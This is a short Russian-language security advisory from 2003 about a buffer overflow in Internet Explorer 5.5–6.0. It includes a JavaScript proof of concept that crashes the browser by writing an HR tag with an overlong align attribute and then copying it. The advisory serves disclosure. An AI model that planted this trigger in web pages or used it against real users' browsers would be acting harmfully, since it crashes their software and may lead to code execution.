Security Lab

Переполнение буфера в Microsoft Internet Explorer

Дата публикации:24.06.2003
Всего просмотров:1372
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Переполнение буфера обнаружено в Microsoft Internet Explorer. Удаленный атакующий может аварийно завершить работу IE и возможно выполнить произвольный код на системе.

Как сообщает Digital Scream, следующий код приведет к аварийному завершению работы IE:

<script>

 wnd=open("about:blank","",""); 

 wnd.moveTo(screen.Width,screen.Height);

 WndDoc=wnd.document;

 WndDoc.open();

 WndDoc.clear();

 buffer="";

 for(i=1;i<=127;i++)buffer+="X";

 buffer+="DigitalScream";

 WndDoc.write("<HR align='"+buffer+"'>");

 WndDoc.execCommand("SelectAll");

 WndDoc.execCommand("Copy");

 wnd.close();

</script>
Уязвимость обнаружена в Microsoft Internet Explorer 5.5-6.0
Ссылки: Internet Explorer >=5.0 : Buffer overflow